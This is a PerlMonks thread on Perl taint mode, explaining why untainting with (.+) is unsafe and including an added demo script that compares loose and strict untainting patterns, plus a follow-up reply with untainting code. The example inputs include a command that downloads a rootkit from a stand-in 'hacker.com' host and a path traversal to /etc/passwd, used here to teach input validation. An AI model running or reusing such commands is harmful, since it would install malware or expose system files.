PerlMonks
Re: proper untainting and use of ref

by tachyon (Chancellor)
on Apr 17, 2002 at 18:24 UTC (#159924=note)


in reply to proper untainting and use of ref

Here is how taint mode works. Any input from outside your code is flagged as tainted until you untaint it. You may not use a tainted value to do things external to your script, like, say, open. You get the value for $userfile from your config file (external) via the tainted $config and then try to open it via open( USER, '>', $userfile ) without untainting it. You need to untaint this value. Untainting with (.+) is bad, as it lets anything through. What if

$userfile = 'wget http://hacker.com/rfp/rootkit.tar.gz > /bin/badfile_to_have_here'

You would also be wise to set a $filepath and concatenate the value for $userfile to it. This is to make it harder to hack and easier to untaint $userfile. Regardless, you must protect your config file (not world readable) and untaint values you use for operations external to your script. Taint will let you know if you have forgotten. Cool huh?

cheers

tachyon

s&&rsenoyhcatreve&&&s&n.+t&"$'$`$\"$\&"&ee&&y&srve&&d&&print
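The following is an added example and is not part of tachyon's post. It is a script to run under perl -T that puts the (.+) pattern from the post beside a restrictive one, and shows what taint mode does when open is handed a value that was never untainted. Everything in it is assumed for illustration: the sample inputs are constructed (made tainted with a zero-length slice of an %ENV value, since %ENV is tainted under -T), the fixed directory is a temporary one standing in for the $filepath the post recommends, and the strict character class is one suggestion rather than a pattern from the post. Scalar::Util::tainted reports the taint status of each result.

```perl
#!/usr/bin/perl -T
# Added example. Run as:  perl -T untaint_demo.pl
use strict;
use warnings;
use Scalar::Util qw(tainted);
use File::Spec;
use File::Temp qw(tempdir);

# Constructed input. Under -T every %ENV value is tainted, so a zero-length
# slice of one is a "taint brush": appending it to a literal yields a tainted
# string, just like a value read from a config file or a CGI parameter.
my $brush   = substr( join( '', values %ENV ), 0, 0 );
my @samples = map { $_ . $brush } (
    'alice',                                    # legitimate user name
    '../../../etc/passwd',                      # path traversal
    'wget http://hacker.com/rfp/rootkit.tar.gz > /bin/badfile_to_have_here',
);

# Stand-in (assumption) for the fixed directory the post recommends: every
# user file lives under $filepath, and only the last path component comes
# from outside the script.
my $filepath = tempdir( CLEANUP => 1 );

# The pattern criticised in the post: any non-empty string is "untainted".
sub untaint_loose {
    my ($value) = @_;
    return $value =~ /^(.+)$/ ? $1 : undef;
}

# A restrictive pattern (assumption): word characters, dots and dashes only,
# not starting with a dot (so no ".." and no dot-files), with a length limit.
# Tighten it to whatever your user names actually look like.
sub untaint_strict {
    my ($value) = @_;
    return $value =~ /^([A-Za-z0-9_][A-Za-z0-9_.-]{0,63})\z/ ? $1 : undef;
}

# Report whether a pattern rejected the value, and if not, whether the
# captured copy is still tainted.
sub describe {
    my ($v) = @_;
    return 'rejected' unless defined $v;
    return tainted($v) ? 'accepted (still tainted)' : 'accepted (untainted)';
}

for my $value (@samples) {
    print "input: $value\n";
    printf "  raw    : tainted=%d\n", tainted($value) ? 1 : 0;
    printf "  loose  : %s\n", describe( untaint_loose($value) );
    printf "  strict : %s\n", describe( untaint_strict($value) );
}

# What taint mode actually enforces: open() for writing with a tainted path
# dies ("Insecure dependency in open") before touching the file system.
my $raw = $samples[0];
my $ok  = eval { open my $fh, '>', File::Spec->catfile( $filepath, $raw ); 1 };
print "open with tainted name: ", ( $ok ? "allowed\n" : "died: $@" );

# The same name, untainted by the strict pattern and anchored under
# $filepath, can be opened normally.
my $clean = untaint_strict($raw);
my $path  = File::Spec->catfile( $filepath, $clean );
open my $fh, '>', $path or die "open $path: $!";
print $fh "user record\n";
close $fh;
print "open with untainted name: wrote $path\n";
```

The loose pattern accepts all three inputs and hands back untainted copies, so taint mode no longer objects to the traversal string or the shell command; the strict pattern accepts only the first. The trailing section shows the failure mode the post describes: the open with the raw tainted name dies inside the eval, while the strictly untainted name is opened under the fixed directory.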

Re: Re: proper untainting and use of ref
by particle (Vicar) on Apr 17, 2002 at 18:39 UTC
    My problem is I've already untainted this data once.

        # ...snip...
        # untaint parameters
        for ( keys %params ) {
            # !!!TODO!!! check 'ref' line for subtle bugs
            ( display_message( $messages{error} ) && exit )
                unless ref( $valid_params{$_} ) eq 'Regexp';
            if ( $params{$_} =~ /$valid_params{$_}/ ) {
                $params{$_} = $1;
            }
            else {
                display_message( $messages{error} ) && exit;
            }
        }
    so the data in %params should be untainted, no? but when it's accessed later, via

    my $userfile = get_userfile( $config, $params{username} );
    $userfile is now tainted, even though $params{username} should be untainted. Am I missing something?

    Update: modifying the get_userfile() sub like so:

        sub get_userfile {
            my ( $config, $username ) = ( shift, shift );
            # add only this line: still tainted
            # ( $config->{ users } ) = ( $config->{ users } =~ /^(.+)$/ );
            # add only this line: untainted
            # ( $username ) = ( $username =~ /^(.+)$/ );
            $config->{ users } . $username;
        }

    So $config and its data are not tainted. Why is $params{ username } still tainted?

    ~Particle ;
